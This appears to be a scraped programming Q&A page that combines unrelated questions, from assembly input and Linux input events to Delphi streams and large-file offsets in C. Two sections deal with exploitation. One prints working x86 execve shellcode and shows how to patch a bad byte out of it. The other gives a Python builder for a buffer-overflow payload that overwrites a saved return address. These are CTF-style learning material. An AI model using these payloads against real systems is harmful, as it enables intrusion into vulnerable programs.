How can I read a whole line of input in Assembly? - string

The only subroutine I know of that can read a user's alphabetical input is read_char, but I want to be able to read the user's whole input, no matter how many characters long it is.
I have a vague notion that I have to make room in memory to store the whole input or something? I'm really lost, as I'm not certain whether Assembly has an equivalent of reading strings in C++.
Thanks in advance.

Well, you should have a limit when reading input from the user, otherwise your program might stop working properly (see buffer overflow for more information), so making room for the input and ensuring the input won't exceed the buffer is very important.
Now, to get a string you can call a DOS interrupt (for example INT 21h, function 0Ah, buffered input), giving it a pointer to your buffer and some other stuff. It will read until a carriage return is met.
But I think your prof wants you to read using his read_char, so (since this is homework) I'll give you a small hint: you have to do a loop and read chars until..

Related

How to deal with a bad char in a shellcode buffer overflow?

So I recently got interested in buffer overflows, and many tutorials and resources online have this CTF-like attack where you need to read the content of a flag file (using cat, for example).
So I started looking online for assembly examples of how to do this and I came across sites like this or shell-storm, where there are plenty of examples on how to do this.
So I generated my exploit and got this machine code (it basically executes a shell doing cat flag):
shellcode = b'\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x66\x6c\x61\x67\x89\xe1\x50\x51\x53\x89\xe1\x31\xc0\x83\xc0\x0b\xcd\x80'
The problem is that, after stepping through with GDB, I noticed that my buffer doesn't get copied from \x0b onward, near the end of the shellcode. I know the problem is there because if I change it to, say, \x3b, then the whole buffer gets copied (together with the rest of my exploit, not shown here), even though it obviously crashes when it reaches the wrong value. After some research, it seems that \x0b is a "bad char" which can cause issues and should be avoided. Having said that, I don't understand how:
All those online and even university tutorials use that shellcode for this exact task.
How to potentially fix this. Is it even possible without completely changing the assembly code?
I will add that I am on Ubuntu and trying to make this work on 64 bits.
One thing that's special about byte 0x0b is it's ASCII Vertical Tab, which is considered a whitespace character.
So I'm going to make a wild guess that the code you're exploiting looks something like
// Dangerous code, DO NOT USE
char buf[TOO_SMALL];
scanf("%s", buf);
since scanf("%s") is a commonly (mis)used input mechanism that stops when it hits whitespace. If so, then if your shellcode contains 0x0b or any other whitespace character, it will get truncated.
To your first question, as to "why do other tutorials use shellcode like this", they may be thinking instead of exploiting code like
// Dangerous code, DO NOT USE
char buf[TOO_SMALL];
gets(buf);
where gets() will not stop reading at 0x0b but only at newline 0x0a. Or maybe they are thinking of a buffer filled by strcpy() which will only stop at 0x00, or maybe a buffer filled by read() with a user-controlled size which will read the full amount of data no matter what bytes it contains. So the question of which characters are "bad" depends on what the vulnerable code actually does.
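To make the "it depends on the input function" point concrete, here is a minimal Python sketch that scans the shellcode from the question for bytes that would cut the copy short. The table of terminating bytes is only my summary of the functions mentioned above, the names BAD_BYTES and find_bad_bytes are made up for illustration, and the scanf row assumes the C locale's definition of whitespace.

```python
# Bytes that stop or truncate input for a few common C input paths.
# Illustrative summary only, not an exhaustive list.
BAD_BYTES = {
    "scanf_s": {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20},  # isspace() in the C locale
    "gets": {0x0A},     # stops at newline
    "strcpy": {0x00},   # stops at the NUL terminator
    "read": set(),      # copies raw bytes, nothing is special
}

# Shellcode exactly as posted in the question.
shellcode = b'\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x66\x6c\x61\x67\x89\xe1\x50\x51\x53\x89\xe1\x31\xc0\x83\xc0\x0b\xcd\x80'


def find_bad_bytes(payload, input_function):
    """Return (offset, byte) pairs that the given input path would choke on."""
    bad = BAD_BYTES[input_function]
    return [(i, b) for i, b in enumerate(payload) if b in bad]


for name in BAD_BYTES:
    hits = find_bad_bytes(shellcode, name)
    print(name, [(i, hex(b)) for i, b in hits])
```

Only the scanf row reports a hit (0x0b at offset 32), which matches what you saw in GDB: the same bytes would pass through gets(), strcpy() or read() untouched.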
As to how to handle it, well, you need to modify your shellcode to use only instructions that don't contain any whitespace bytes. This sort of thing is more an art than a science; you have to know your instruction set well, and be creative in thinking about alternative instruction sequences to achieve the desired result. Sometimes you may be able to do it with minor tweaks; other times a wholesale rewrite may be needed. It really varies.
In this case, luckily the 0x0b is the only whitespace character in the whole code, and it appears in the instruction
83C00B add eax, 0x0b
Since eax was previously zeroed, the goal is to load it with the value 0xb which is the system call number of execve. When the "bad byte" appears as part of immediate data, it is usually not too hard to find another way to get that data to where it needs to go. (Life is harder when the bad byte is part of the opcode itself.) In this case, a simple solution is to take advantage of two's complement, and write instead
83E8F5 sub eax, -0x0b
The single byte -0x0b = 0xf5 gets sign-extended to 32 bits and used as the value to subtract, which leaves 0x0b in eax as desired. Of course there are lots of other ways, some of which may have smaller code size; I'll leave this to your ingenuity.
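If you want to convince yourself of the arithmetic before touching the exploit, the following Python sketch models the sign extension and the 32-bit subtraction, then swaps the three instruction bytes in the shellcode from the question. The helper names are mine, and this only simulates the arithmetic; it does not execute any machine code.

```python
def sign_extend_8(value):
    """Interpret an 8-bit immediate as a signed integer, as the CPU does for opcode 83."""
    return value - 0x100 if value & 0x80 else value


def sub32(a, b):
    """Subtraction with 32-bit wrap-around, modelling `sub eax, imm`."""
    return (a - b) & 0xFFFFFFFF


eax = 0                                  # eax was zeroed by `xor eax, eax`
eax = sub32(eax, sign_extend_8(0xF5))    # sub eax, -0x0b
print(hex(eax))

# Shellcode exactly as posted in the question.
original = b'\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x66\x6c\x61\x67\x89\xe1\x50\x51\x53\x89\xe1\x31\xc0\x83\xc0\x0b\xcd\x80'

# Replace `add eax, 0x0b` (83 C0 0B) with `sub eax, -0x0b` (83 E8 F5).
patched = original.replace(b'\x83\xc0\x0b', b'\x83\xe8\xf5')

whitespace = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20}
print(any(b in whitespace for b in patched))
```

The replacement is the same length as the original instruction, so no offsets elsewhere in the payload need to change.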
Finding the "bad chars" for your shellcode is an important step in exploiting an overflow vulnerability.
First, you have to figure out how many bytes you can overflow on the target (this region is also where the shellcode goes). If the region is big enough, you can send every byte value from \x01 to \xff to the target in place of the shellcode (\x00 is almost always a bad char; search for "bad char" for more background).
Then you can inspect the registers and memory in a debugger to see which bytes are left. (If the region is not big enough for all the values, send only some of them at a time and repeat.)
You can follow this guide: https://netsec.ws/?p=180.
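The send-and-compare loop described above can be sketched in Python as follows. Everything here is hypothetical scaffolding: fake_scanf_target stands in for "send the bytes, then dump the buffer in the debugger", and I assume a target that stops at C whitespace just so the loop has something to find.

```python
def all_test_bytes(exclude=(0x00,)):
    """Every byte value except the excluded ones (0x01..0xff by default)."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_byte(sent, observed):
    """Return the first byte that was dropped, altered, or caused truncation, else None."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def fake_scanf_target(payload):
    """Hypothetical stand-in for the real target: keeps bytes up to the first whitespace."""
    whitespace = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20}
    for i, b in enumerate(payload):
        if b in whitespace:
            return payload[:i]
    return payload


bad = [0x00]                      # assume NUL is bad from the start
while True:
    sent = all_test_bytes(exclude=bad)
    culprit = first_bad_byte(sent, fake_scanf_target(sent))
    if culprit is None:
        break
    bad.append(culprit)           # drop it and try again

print([hex(b) for b in bad])
```

Against a real target you would replace fake_scanf_target with whatever you copy out of the debugger after each run; the loop itself stays the same.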

read() in linux for event file

I'm writing a program to track mouse movements in Linux. I read in another post that this can be done by using the read() system call to read the eventX file related to the mouse. Earlier I was reading the serial port file, and I used read() for that too. But there I passed in a character array and got back the serial characters. That doesn't seem to be how it works in the mouse's case. The lines:
struct input_event ie;
read(fd, &ie, sizeof(struct input_event));
are used to read it. Here ie is a struct, whereas I passed in a char buffer in the serial port case. So my question is: how do I know what struct/buffer to pass? I found the two lines above by googling, but if I want to read some other file, how would I know what struct/buffer to pass? Please help me.
Thank you.
The input subsystem in Linux uses a standardized format to deliver its messages. It is actually quite simple:
You open the relevant input file, usually /dev/input/event<n>, using the open() system call.
You read input events from that file, using the read() function, as you noted in your question.
Every event from that file has a well known structure: that is struct input_event. You don't need to know the exact layout of that structure, that is done by the compiler. Just include the relevant header file: #include <linux/input.h>.
What you do want to know are the fields of this structure that are useful, and what they mean. I recommend reading the official documentation as well as the input.h source.
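To show what "a well known structure" means in practice, here is a minimal Python sketch that decodes the same records by hand. It assumes the common layout where struct timeval is two C longs (24 bytes per event on 64-bit Linux); the function names are made up for illustration, and in C you would simply let <linux/input.h> handle all of this.

```python
import struct

# Native layout of struct input_event: struct timeval (two C longs),
# then __u16 type, __u16 code, __s32 value. Assumes time_t is a C long.
EVENT_FORMAT = "llHHi"
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)

EV_REL = 0x02   # relative movement (value from linux/input-event-codes.h)
REL_X = 0x00
REL_Y = 0x01


def parse_event(raw):
    """Unpack one raw input_event record into a dict."""
    sec, usec, ev_type, code, value = struct.unpack(EVENT_FORMAT, raw)
    return {"time": sec + usec / 1_000_000, "type": ev_type, "code": code, "value": value}


def read_events(path):
    """Yield events from a device node such as /dev/input/event<n> (usually needs root)."""
    with open(path, "rb", buffering=0) as device:
        while True:
            raw = device.read(EVENT_SIZE)
            if raw is None or len(raw) < EVENT_SIZE:
                break
            yield parse_event(raw)


# Decode a hand-built record instead of touching a real device.
sample = struct.pack(EVENT_FORMAT, 1, 500000, EV_REL, REL_X, -5)
print(parse_event(sample))
```

For any other special file the answer is the same as here: the driver's documentation or header tells you the record format, and a plain byte stream (like your serial port) just has none.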

Windows console application with gets() ROP exploit

I'm trying (for learning purposes) to take advantage of the gets() function vulnerability using the return-oriented programming (ROP) technique. The target program is a Windows console application that at some point asks for some input, and then uses gets() to store the input in a local 80-character array.
I created a file that contains 80 'a' characters at the beginning + some extra characters + the address 0x5da06c48 for overwriting the saved EIP.
I'm opening the file in a text editor and copy-pasting the content into the console as input. I've used IDA Pro (or OllyDbg) to set a breakpoint right after the return from the gets() function and noticed that the address was corrupted: it was set to 0x3fa03f48 (two 3f substitutions).
I've tried other addresses as well. Some of them work well, but most of the time the address gets corrupted (sometimes characters are missing or substituted, sometimes it is truncated).
How can I get around this problem? Any suggestion will be highly appreciated!
Copy-Pasting binary data is hit-and-miss. Have you tried feeding the input into your test program directly from the file using input redirection?
First of all, keep track of the endianness of your platform. If you think your bytes are in the right order but you are still getting malformed input, it might be that your shell or text editor isn't binary safe. You are better off writing an exploit for this flaw in a scripting language such as Python, using the subprocess module, which allows you to write data directly to an arbitrary process's stdin pipe.
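A minimal sketch of that approach, assuming a 32-bit little-endian target. The function names are mine, the filler length of 8 is a placeholder for the "some extra characters" in the question, and the child process below is just a Python one-liner that echoes its stdin as hex so you can see that the bytes arrive unmodified.

```python
import struct
import subprocess
import sys


def build_payload(buffer_len, filler_len, address):
    """Buffer padding, filler up to the saved return address, then the address (little-endian)."""
    return b"a" * buffer_len + b"b" * filler_len + struct.pack("<I", address)


def feed_stdin(command, payload):
    """Run command, write payload plus a newline to its stdin as raw bytes, return its stdout."""
    result = subprocess.run(command, input=payload + b"\n", stdout=subprocess.PIPE)
    return result.stdout


# filler_len=8 is a placeholder; the real distance depends on the target's stack frame.
payload = build_payload(80, 8, 0x5DA06C48)

# Stand-in for the real target: echoes everything it reads from stdin as hex.
echo_hex = [sys.executable, "-c", "import sys; print(sys.stdin.buffer.read().hex())"]
print(feed_stdin(echo_hex, payload))
```

To use it against the real program, pass its path instead of echo_hex. Keep in mind that gets() stops at a newline, so the payload itself must not contain 0x0a.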

How to partially read from a TStringStream, free the read data from the stream and keep the rest (the unread data)?

What I want to do: let's suppose I have a TStringStream that just read a string with 100 characters. If I call .ReadString(50), I will get the first 50 characters of this stream and its cursor is going to be placed at position 51.
My question is: how do I toss the characters 1 to 50 in this stream in a fast and clean way? I want to read the rest (51 to 100) later.
Thanks in advance.
You cannot do what you are hoping to do. The string stream's data is a Delphi string which is stored as a single memory block. Memory blocks are atomic, they cannot be split. You cannot free some part of a memory block.
If you really need to return memory to the memory manager then you should create a new string with the already processed data removed. You can then re-create your string stream with this new input and destroy the previous string stream.
Having said that, it's hard to see that doing much other than increasing your memory fragmentation. If the sizes of memory involved are large enough, and if the string stream persists for long enough, then this just might be a sensible approach. Otherwise it sounds like an attempt to optimise that actually would hinder performance.
Perhaps some class other than string stream could be more appropriate but it's very hard to advise without knowing more details.
You can't do this. If you really need to do this, you should write your own class that implements the stream-interface and which would let you process some data a little bit at a time and free whatever you want to free. Note that you would only be able to go through the data once, since you've now deleted your data. That is, seeking to the beginning again would become impossible, and your current stream "position" would be a lie.
In short, sounds like you're confused.
If I understand correctly, you wish to skip forward in the stream?
You can do:
Str.Position := Str.Position + 50;
Or like this:
Str.Seek(50,TSeekOrigin.soCurrent);

Doing file operations with 64-bit addresses in C + MinGW32

I'm trying to read in a 24 GB XML file in C, but it won't work. I'm printing out the current position using ftell() as I read it in, but once it gets to a big enough number, it goes back to a small number and starts over, never even getting 20% through the file. I assume this is a problem with the range of the variable that's used to store the position (long), which can go up to about 4,000,000,000 according to http://msdn.microsoft.com/en-us/library/s3f49ktz(VS.80).aspx, while my file is 25,000,000,000 bytes in size. A long long should work, but how would I change what my compiler(Cygwin/mingw32) uses or get it to have fopen64?
The ftell() function returns a long, which is only 32 bits wide on 32-bit systems (and on Windows in general), so it can only represent offsets up to 2^31 - 1 bytes (2 GB). So you can't get the file offset for a 24 GB file to fit into a 32-bit long.
You may have a 64-bit variant available (such as ftello64() in MinGW or _ftelli64() in the Microsoft runtime), or the standard fgetpos() function may return a larger offset to you.
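The "goes back to a small number and starts over" behaviour from the question is just this wrap-around. Here is a quick Python sketch of the arithmetic; as_int32 is a made-up helper that models what a signed 32-bit long would hold, it is not part of any C library.

```python
def as_int32(offset):
    """Value a signed 32-bit long would hold once the true offset wraps."""
    offset &= 0xFFFFFFFF
    return offset - 0x1_0000_0000 if offset >= 0x8000_0000 else offset


file_size = 25_000_000_000

print(as_int32(2**31 - 1))       # last offset that still fits
print(as_int32(2**31))           # one byte further: wraps to a negative value
print(as_int32(file_size))       # what the end of the file would look like
print(file_size.bit_length())    # bits actually needed for the real offset
```

The true end-of-file offset needs 35 bits, so any API that hands it back in a 32-bit long cannot report it correctly, whatever the compiler.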
You might try using the OS provided file functions CreateFile and ReadFile. According to the File Pointers topic, the position is stored as a 64bit value.
Unless you can use a 64-bit method as suggested by Loadmaster, I think you will have to break the file up.
This resource seems to suggest it is possible using _telli64(). I can't test this though, as I don't use mingw.
I don't know of any way to do this with one file. It's a bit of a hack, but if splitting the file up properly isn't a real option, you could write a few functions that temporarily split the file: one that uses ftell() to move through the file and switches to the next piece when it reaches the split point, and another that stitches the pieces back together before exiting. It's an absolutely botched-up approach, but if no better solution comes to light it could be a way to get the job done.
I found the answer. Instead of using fopen, fseek, fread, fwrite... I'm using _open, _lseeki64, read, write. And I am able to write and seek in files larger than 4 GB.
Edit: It seems the latter functions are about 6x slower than the former ones. I'll give the bounty to anyone who can explain that.
Edit: Oh, I learned here ("What is the difference between read() and fread()?") that read() and friends are unbuffered.
Even if the ftell() in the Microsoft C library returns a 32-bit value and thus obviously will return bogus values once you reach 2 GB, just reading the file should still work fine. Or do you need to seek around in the file, too? For that you need _ftelli64() and _fseeki64().
Note that unlike some Unix systems, you don't need any special flag when opening the file to indicate that it is in some "64-bit mode". The underlying Win32 API handles large files just fine.
